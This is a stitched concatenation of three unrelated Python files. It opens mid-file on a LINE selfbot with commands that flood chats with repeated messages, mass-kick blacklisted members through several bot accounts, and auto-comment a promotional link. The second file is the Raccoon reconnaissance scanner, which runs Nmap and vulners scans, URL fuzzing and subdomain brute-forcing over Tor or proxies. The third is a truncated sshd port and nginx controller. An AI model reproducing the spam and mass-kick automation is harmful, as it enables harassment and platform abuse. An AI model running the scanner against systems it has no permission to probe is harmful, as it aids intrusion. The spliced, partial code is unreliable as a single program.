if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
#ki.sendText(msg.to,"Dilarang Banned Bot")
#ki2.sendText(msg.to,"Dilarang Banned Bot")
#ki3.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun telah sukses di banned")
except:
ki.sendText(msg.to,"Error")
elif "Unbanned @" in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
#ki.sendText(msg.to,"Tidak Ditemukan.....")
#ki2sendText(msg.to,"Tidak Ditemukan.....")
#ki3.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#-----------------------------------------------
elif msg.text in ["Test"]:
ki.sendText(msg.to,"Ok double thumbs up")
ki2.sendText(msg.to,"Ok double thumbs up")
ki3.sendText(msg.to,"Ok double thumbs up")
#-----------------------------------------------
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
#-----------------------------------------------
elif msg.text in ["say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
ki2.sendText(msg.to,"Hi buddy Har Har")
ki3.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["say hinata pekok"]:
ki.sendText(msg.to,"Hinata pekok Har Har")
ki2.sendText(msg.to,"Hinata pekok Har Har")
ki3.sendText(msg.to,"Hinata pekok Har Har")
elif msg.text in ["#welcome"]:
ki.sendText(msg.to,"Selamat datang di Chivas Family Room")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
#-----------------------------------------------
elif msg.text in ["Respon","respon"]:
ki.sendText(msg.to,"(`・ω・`)")
ki2.sendText(msg.to,"(`・ω・`)")
ki3.sendText(msg.to,"(`・ω・`)")
ki4.sendText(msg.to,"(`・ω・`)")
ki5.sendText(msg.to,"(`・ω・`)")
ki6.sendText(msg.to,"(`・ω・`)")
ki7.sendText(msg.to,"(`・ω・`)")
ki8.sendText(msg.to,"(`・ω・`)")
ki9.sendText(msg.to,"(`・ω・`)")
ki10.sendText(msg.to,"(`・ω・`)")
#-----------------------------------------------
elif "Spam " in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
# Keke is pretty <3
if txt[1] == "on":
if jmlh <= 60:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Kelebihan batas:v")
elif txt[1] == "off":
if jmlh <= 100:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Kelebihan batas :v")
elif msg.text in ["Speed","Speedbot","speedbot"]:
if msg.from_ in Bots or msg.from_ in staff:
start = time.time()
cl.sendText(msg.to, "Waiting...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
elif "Add staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Add admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin add executing"
_name = msg.text.replace("Add admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Added to the admin list")
except:
pass
print "[Command]admin add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin remove executing"
_name = msg.text.replace("Remove admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Removed to the admin list")
except:
pass
print "[Command]admin remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Stafflist executed"
elif msg.text in ["Admin list","admin list"]:
if admin == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Admin list:")
mc = ""
for mi_d in admin:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Adminlist executed"
elif msg.text in ["Ip Like", "Ar like"]:
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s) from staff")
try:
likePost()
except:
pass
#------------------------------------------------------------------
elif msg.text in ["Banned"]:
if msg.from_ in admin or msg.from_ in staff:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin or msg.from_ in staff:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#--------- Banlist command --------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
ki.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +ki.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Banlist executed"
#--------- Banlist command finish --------#
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill"]:
if msg.from_ in admin or msg.from_ in staff:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"There was no blacklist user")
#ki2.sendText(msg.to,"There was no blacklist user")
#ki3.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
ki.sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(msg.to,[_mid])
ki.sendText(msg.to,"I pretended to cancel and canceled.")
elif "album→" in msg.text:
try:
albumtags = msg.text.replace("album→","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakec→" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakec→","")
cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "midb:" in msg.text:
midd = msg.text.replace("midb:","")
wait["blacklist"][midd] = True
elif "#終了" in msg.text:
try:
import sys
sys.exit()
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
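# a2(): True except when the current minute is a ten-minute mark; the commented-out loop in nameUpdate() used it to wait for the next mark.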
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
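# Background thread: while wait["clock"] is on, refresh the display name with the current (HH:MM) every ten minutes.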
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
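# autolike(): walks the 20 newest timeline posts and likes/comments on any that are not liked yet.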
def autolike():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like By : IP\n\nhttp://line.me/ti/p/zuFNPuXyEb")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like By: IP\n\nhttp://line.me/ti/p/zuFNPuXyEb")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(500)
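# Main loop: long-poll for new operations, advance the stored revision, and hand each op to bot().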
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
import time
import asyncio
import threading
import click
import sys
import os
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
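# intro() prints the startup banner; the click decorators below define the CLI.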
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.3")
@click.argument("target")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan. "
"Runs instead of the regular Nmap scan and is longer.")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "utils/misc/vulners.nse"),
help="Path to the custom nmap_vulners.nse script."
"If not used, Raccoon uses the built-in script it ships with.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host=host, port_range=port, vulners_path=vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(
host=host,
port_range=port,
full_scan=full_scan,
scripts=scripts,
services=services)
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
if __name__ == "__main__":
main()
|
controller.py
|
#!/usr/bin/env python
from __future__ import print_function
import logging
LOG_FORMAT = '%(asctime)s %(levelname)s %(pathname)s:%(lineno)s: %(message)s'
logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG)
import os
import signal
import sys
import six
import threading
import time
import pprint
import psutil
import atexit
import argparse
import jinja2
from flask import Flask, Response, url_for, render_template, jsonify, request, current_app
from flask.json import JSONEncoder
from flask_reverse_proxy import ReverseProxied
from tornado.netutil import Resolver
from tornado import gen
import socket
# Defaults
DEFAULT_WAIT_DELAY = 0.1
DEFAULT_CONTROL_SOCKET_PATH = '/var/run/connector.sock'
DEFAULT_NGINX_PID_FILE = '/var/log/nginx/nginx.pid'
DEFAULT_NGINX_CONF_FILE = '/etc/nginx/conf.d/default.conf'
DEFAULT_NGINX_PORT = 8080
DEFAULT_PORT = 9090
DEFAULT_HOST = '0.0.0.0'
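# Watches which loopback ports (other than 22) sshd is listening on by polling
# psutil, and invokes a callback whenever that set of ports changes.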
class PortWatcher(object):
INSTANCE = None
@classmethod
def instance(cls):
return cls.INSTANCE
@classmethod
def start_instance(cls, *args, **kwargs):
if cls.INSTANCE is None:
cls.INSTANCE = cls(*args, **kwargs)
return cls.INSTANCE
def __init__(self, ports_changed_cb=None, wait_delay=DEFAULT_WAIT_DELAY):
self._ports_changed_cb = ports_changed_cb
self._wait_delay = wait_delay
self._thread_lock = threading.RLock()
self._thread = threading.Thread(name='PortWatchLoop', target=self._update_ports)
self._thread.daemon = True
self._stop_thread = False
self._ports = set()
self._thread.start()
logging.info('Started port watcher')
@property
def ports(self):
with self._thread_lock:
return self._ports.copy()
def _update_ports(self):
while True:
with self._thread_lock:
if self._stop_thread:
return
# get sshd ports
ports = set([])
try:
for proc in psutil.process_iter():
if proc.name() == 'sshd':
for conn in proc.connections():
laddr_ip = conn.laddr[0]
laddr_port = conn.laddr[1]
if conn.status == psutil.CONN_LISTEN and \
laddr_port != 22 and \
laddr_ip in ('127.0.0.1', 'localhost'):
# logging.info('Connection %r', conn)
ports.add(laddr_port)
except (psutil.AccessDenied, psutil.NoSuchProcess):
try:
for conn in psutil.net_connections('inet'):
laddr_ip = conn.laddr[0]
laddr_port = conn.laddr[1]
if conn.status == psutil.CONN_LISTEN and \
laddr_port != 22 and \
laddr_ip in ('127.0.0.1', 'localhost'):
if conn.pid is None and laddr_port > 1023:
# logging.info('Connection %r', conn)
ports.add(laddr_port) # unsafe
else:
for p in psutil.process_iter():
if p.pid == conn.pid and 'sshd' in p.name():
# logging.info('Connection %r', conn)
ports.add(laddr_port)
break
except psutil.AccessDenied:
logging.exception('Could not get any information about ports')
notify_ports = None
with self._thread_lock:
if self._ports != ports:
logging.info('Ports changed from %s to %s', self._ports, ports)
if self._ports_changed_cb:
notify_ports = ports.copy()
self._ports = ports
if notify_ports is not None:
self._ports_changed_cb(notify_ports)
del notify_ports
time.sleep(self._wait_delay)
def stop(self):
with self._thread_lock:
if self._stop_thread:
return
self._stop_thread = True
self._thread.join()
class RegisteredPort(object):
def __init__(self, port, name, type, description):
self.port = port
self.name = name
self.type = type
self.description = description
def __repr__(self):
        return 'RegisteredPort(port=%r, name=%r, type=%r, description=%r)' % \
(self.port, self.name, self.type, self.description)
def to_json(self):
return {'port': self.port,
'registered': True,
'name': self.name,
'type': self.type,
'description': self.description
}
class PortManagerException(Exception):
def __init__(self, message):
self.message = message
super(PortManagerException, self).__init__(message)
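# Tracks which of the currently bound ports are registered under a name and
# fires the (un)registration callbacks, which start_server uses to regenerate
# the nginx config.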
class PortManager(object):
def __init__(self, port_registered_cb=None, port_unregistered_cb=None):
self.registered_ports_by_port = {}
self.registered_ports_by_name = {}
self.bound_ports = set()
self.port_registered_cb = port_registered_cb
self.port_unregistered_cb = port_unregistered_cb
def register(self, port, name, type='tcp', description=None):
if port not in self.bound_ports:
raise PortManagerException('Port {} is not bound'.format(port))
if port in self.registered_ports_by_port:
raise PortManagerException('Port {} is already registered'.format(port))
if name in self.registered_ports_by_name:
            raise PortManagerException('Port with name {} already exists'.format(name))
rport = RegisteredPort(port=port, name=name, type=type, description=description)
self.registered_ports_by_port[port] = rport
self.registered_ports_by_name[name] = rport
if self.port_registered_cb:
self.port_registered_cb(rport)
return rport
def get_by_port(self, port):
return self.registered_ports_by_port.get(port, None)
def get_by_name(self, name):
return self.registered_ports_by_name.get(name, None)
def update_accessible_ports(self, ports):
removed_ports = self.bound_ports - ports
self.bound_ports = ports.copy()
for port in removed_ports:
self.unregister_by_port(port)
def unregister_by_port(self, port):
rport = self.registered_ports_by_port.get(port, None)
if rport is None:
return False
assert port == rport.port
del self.registered_ports_by_port[port]
del self.registered_ports_by_name[rport.name]
if self.port_unregistered_cb:
self.port_unregistered_cb(rport)
return True
def unregister_by_name(self, name):
rport = self.registered_ports_by_name.get(name, None)
if rport is None:
return False
assert name == rport.name
del self.registered_ports_by_name[name]
del self.registered_ports_by_port[rport.port]
if self.port_unregistered_cb:
self.port_unregistered_cb(rport)
return True
def unregister(self, obj):
if isinstance(obj, RegisteredPort):
return self.unregister_by_port(obj.port)
if isinstance(obj, six.integer_types):
return self.unregister_by_port(obj)
else:
return self.unregister_by_name(obj)
def to_json(self):
d = []
for v in six.itervalues(self.registered_ports_by_port):
d.append(v.to_json())
for p in self.bound_ports:
if p not in self.registered_ports_by_port:
d.append({'port': p, 'registered': False})
return d
class NginxTemplateGenerator(object):
def __init__(self,
nginx_port=DEFAULT_NGINX_PORT,
nginx_conf_file=DEFAULT_NGINX_CONF_FILE,
nginx_pid_file=DEFAULT_NGINX_PID_FILE,
controller_port=DEFAULT_PORT):
self.nginx_port = nginx_port
self.nginx_conf_file = nginx_conf_file
self.nginx_pid_file = nginx_pid_file
self.controller_port = controller_port
dir = os.path.dirname(__file__)
self.env = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.join(dir, 'templates')))
self.template = self.env.get_template('default.conf.j2')
def generate(self, port_manager):
output = self.template.render(
controller_port=self.controller_port,
nginx_port=self.nginx_port,
bound_ports=port_manager.bound_ports,
registered_ports_by_port=port_manager.registered_ports_by_port,
registered_ports_by_name=port_manager.registered_ports_by_name)
        with open(self.nginx_conf_file, 'w') as fd:
fd.write(output)
def reload_nginx_config(self):
try:
with open(self.nginx_pid_file, 'r') as fd:
pid = int(fd.read().strip())
os.kill(pid, signal.SIGHUP)
return True
except Exception:
logging.exception('Could not reload nginx configuration')
return False
# Global Data
LOCK = threading.RLock()
PORT_MANAGER = None # Shared, locked by LOCK
NGINX_TEMPLATE_GEN = None # Shared, locked by LOCK
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, PortManager):
return obj.to_json()
elif isinstance(obj, RegisteredPort):
return obj.to_json()
return JSONEncoder.default(self, obj)
app = Flask(__name__)
app.wsgi_app = ReverseProxied(app.wsgi_app)
app.json_encoder = CustomJSONEncoder
control_app = Flask(__name__)
control_app.json_encoder = CustomJSONEncoder
HTTP_OK = 200
HTTP_NO_CONTENT = 204
HTTP_BAD_REQUEST = 400
HTTP_NOT_FOUND = 404
HTTP_INTERNAL_SERVER_ERROR = 500
HTTP_NOT_IMPLEMENTED = 501
def error_response(message, status_code=HTTP_INTERNAL_SERVER_ERROR):
response = jsonify({'error': message, 'status': status_code})
response.status_code = status_code
return response
def bad_request(message):
return error_response(message=message, status_code=HTTP_BAD_REQUEST)
class BadRequestError(Exception):
def __init__(self, message):
self.message = message
super(BadRequestError, self).__init__(message)
@app.errorhandler(BadRequestError)
@control_app.errorhandler(BadRequestError)
def on_bad_request_error(error):
return bad_request(error.message)
@app.errorhandler(PortManagerException)
@control_app.errorhandler(PortManagerException)
def on_port_manager_exception(error):
return bad_request('PortManager error: ' + error.message)
@app.route("/", methods=["GET"])
def get_root():
global PORT_MANAGER, LOCK
with LOCK:
return render_template("index.html",
bound_ports=PORT_MANAGER.bound_ports,
registered_ports_by_port=PORT_MANAGER.registered_ports_by_port,
registered_ports_by_name=PORT_MANAGER.registered_ports_by_name)
@control_app.route("/", methods=["GET"])
def control_get_root():
return "Control server"
@control_app.route("/ports/")
@app.route("/ports/")
def get_ports():
with LOCK:
return jsonify(PORT_MANAGER)
@app.route("/reload_nginx_config")
def get_reload_nginx_config():
if NGINX_TEMPLATE_GEN.reload_nginx_config():
return 'Success'
else:
return 'Reload failed'
def default_value(value, default=None):
if not value:
return default
return value
@control_app.route("/ports/<port>", methods=["GET", "PUT", "DELETE"])
def control_ports(port):
if request.method == "GET":
with LOCK:
try:
port = int(port)
if port not in PORT_MANAGER.bound_ports:
return error_response('Port is not bound', HTTP_NOT_FOUND)
rport = PORT_MANAGER.get_by_port(port)
if rport is None:
return jsonify({'port': port, 'registered': False})
except ValueError:
rport = PORT_MANAGER.get_by_name(port)
if rport is None:
return error_response('No port with name {}'.format(port), HTTP_NOT_FOUND)
else:
return jsonify(rport)
elif request.method == "PUT":
data = request.get_json(silent=True)
if data is None:
return bad_request("No json data in body")
try:
port = int(port)
except ValueError:
